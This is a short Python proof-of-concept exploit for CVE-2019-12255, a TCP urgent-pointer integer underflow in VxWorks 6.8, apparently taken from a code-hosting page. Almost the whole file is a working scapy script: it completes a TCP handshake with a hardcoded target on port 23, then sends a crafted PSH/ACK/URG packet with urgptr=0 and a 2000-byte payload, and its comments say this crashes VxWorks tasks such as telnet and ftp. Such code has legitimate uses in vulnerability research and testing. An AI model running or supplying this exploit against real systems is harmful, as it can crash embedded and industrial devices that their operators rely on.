28 lines
No EOL
1 KiB
Python
Executable file
28 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
|
|
# Discovered By: Armis Security
|
|
# PoC Author: Zhou Yu (twitter: @504137480)
|
|
# Vendor Homepage: https://www.windriver.com
|
|
# Tested on: VxWorks 6.8
|
|
# CVE: CVE-2019-12255
|
|
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
|
|
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
|
|
|
|
from scapy.all import *
|
|
|
|
if __name__ == "__main__":
|
|
ip = "192.168.10.199"
|
|
dport = 23
|
|
seq_num = 1000
|
|
payload = "\x42"*2000
|
|
sport = random.randint(1024,65535)
|
|
|
|
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
|
|
syn_ack = sr1(syn)
|
|
|
|
seq_num = seq_num + 1
|
|
ack_num = syn_ack.seq+1
|
|
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
|
|
send(ack)
|
|
|
|
psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
|
|
send(psh) |